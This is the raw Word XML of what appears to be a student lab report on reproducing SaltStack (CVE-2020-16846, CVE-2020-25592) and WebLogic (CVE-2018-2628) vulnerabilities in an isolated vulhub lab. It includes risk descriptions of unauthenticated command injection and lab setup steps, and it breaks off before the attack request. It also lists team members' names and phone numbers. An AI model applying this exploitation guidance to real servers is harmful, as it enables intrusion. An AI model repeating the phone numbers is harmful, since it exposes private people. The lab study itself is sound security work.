        <w:spacing w:line="360" w:lineRule="auto"/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Weblogic反序列化远程代码执行绕过漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2018-2628</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 反序列化远程代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc8277"/>
      <w:bookmarkStart w:id="8" w:name="_Toc32430"/>
      <w:bookmarkStart w:id="9" w:name="_Toc24528"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.工作计划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（25分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc21093"/>
      <w:bookmarkStart w:id="11" w:name="_Toc10156"/>
      <w:bookmarkStart w:id="12" w:name="_Toc13939"/>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作人员</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="14"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1974" w:tblpY="256"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="817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2"/>
        <w:gridCol w:w="1722"/>
        <w:gridCol w:w="1138"/>
        <w:gridCol w:w="450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7" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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序号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="172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职务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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姓名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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联系方式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6" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="172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组长</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"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val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>岳志鑫</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"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val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>18722207295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6" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="172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组员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"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val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>吴大坚</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"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val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>18858768981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6" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="172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组员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"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val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>黄昶玮</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"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val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>13909685086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6" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="172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组员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"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val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>王天宇</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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15358739737</w:t>
            </w:r>
            <w:bookmarkStart w:id="39" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="39"/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6" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="172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组员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc3137"/>
      <w:bookmarkStart w:id="14" w:name="_Toc19764"/>
      <w:bookmarkStart w:id="15" w:name="_Toc18367"/>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker+vulhub搭建的漏洞测试靶场</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上进行CVE库中已知漏洞的检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc7909"/>
      <w:bookmarkStart w:id="17" w:name="_Toc33"/>
      <w:bookmarkStart w:id="18" w:name="_Toc5023"/>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现阶段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="14"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1852" w:tblpY="341"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="87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43"/>
        <w:gridCol w:w="43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4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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项目阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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工作内容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4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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确认复现的漏洞目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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确定需要复现的漏洞及目标系统或应用程序。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4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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了解分析漏洞并设计方案</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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详细了解漏洞的原理、影响和利用方法。这包括查阅漏洞报告、CVE（通用漏洞披露）数据库和其他公开资料。根据漏洞的原理和利用方法设计出合理的漏洞复现方案。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4343" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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</w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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</w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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配置漏洞环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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设计一个合适的实验环境来模拟目标系统。这可以是虚拟机、容器或其他隔离的环境，并选择适当的工具或框架来执行漏洞复现，以确保安全性并方便测试。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4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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验证漏洞并分析结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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使用选定的工具或方法执行漏洞验证，并分析漏洞验证的结果。这可能包括检查是否有异常行为、获取访问权限或执行任意命令等。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4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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记录漏洞复现过程并撰写报告</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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记录复现过程中的所有步骤、配置和结果。这有助于后续的分析、报告编写和修补漏洞。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc1860"/>
      <w:bookmarkStart w:id="20" w:name="_Toc18669"/>
      <w:bookmarkStart w:id="21" w:name="_Toc29668"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4风险等级</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="14"/>
        <w:tblW w:w="87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3"/>
        <w:gridCol w:w="1651"/>
        <w:gridCol w:w="57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403" w:type="dxa"/>
            <w:vAlign w:val="center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编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1651" w:type="dxa"/>
            <w:vAlign w:val="center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风险等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center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风险描述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403" w:type="dxa"/>
            <w:vAlign w:val="center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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1651" w:type="dxa"/>
            <w:vAlign w:val="center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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center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CVE-2020-16846（命令注入漏洞）可以实现未经过身份验证的攻击者通过发送特制请求包，可通过 Salt API 注入 ssh 连接命令，导致命令执行。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403" w:type="dxa"/>
            <w:vAlign w:val="center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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1651" w:type="dxa"/>
            <w:vAlign w:val="center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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center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CVE-2020-25592（验证绕过漏洞）导致未经过身份验证的远程攻击者通过发送特制的请求包，可以通过 salt-api 绕过身份验证，并使用 salt ssh 连接目标服务器。结合 CVE-2020-16846 可能造成命令执行。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403" w:type="dxa"/>
            <w:vAlign w:val="center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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1651" w:type="dxa"/>
            <w:vAlign w:val="center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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center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CVE-2018-2628</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>可以通过构造和发送特定的T3请求，利用T3协议中的反序列化漏洞，触发目标服务器上的恶意Java反序列化代码执行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc6854"/>
      <w:bookmarkStart w:id="23" w:name="_Toc28758"/>
      <w:bookmarkStart w:id="24" w:name="_Toc6133"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.漏洞复现过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc18532"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.1 风险管理及规避</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次风险规避主要采用隔离环境的方法：在进行漏洞复现之前，在隔离的实验环境中进行测试。使用VMware虚拟机和docker容器来模拟客户系统，并确保与生产环境相互隔离，以防止意外影响到真实系统。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在测试过程中，明确定义和限制测试的范围</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>并详细记录所有步骤、配置和结果，时刻关注潜在的风险和问题。必要时，在客户系统上创建快照或备份，以便在测试期间出现问题时可以进行还原，减少潜在的风险和损失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc4033"/>
      <w:bookmarkStart w:id="27" w:name="_Toc10352"/>
      <w:bookmarkStart w:id="28" w:name="_Toc23034"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2020-16846</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> || </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2020-25592</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>搭建漏洞环境并启动</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:t>执行以下命令启动SaltStack-Master服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:ind w:firstLine="482" w:firstLineChars="200"/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docker-compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    环境启动后，将会在本地监听如下端口：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4505/4506 这是SaltStack Master与minions通信的端口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8000 这是Salt的API端口，需要通过https访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2222 这是容器内部的SSH服务器监听的端口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">访问https://your-ip:8000/run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，并使用burp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行抓包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2961640" cy="2922905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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Burp抓包结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4203700" cy="2734310"/>
            <wp:effectExtent l="0" t="0" r="6350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将以下请求发送到上述网址</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
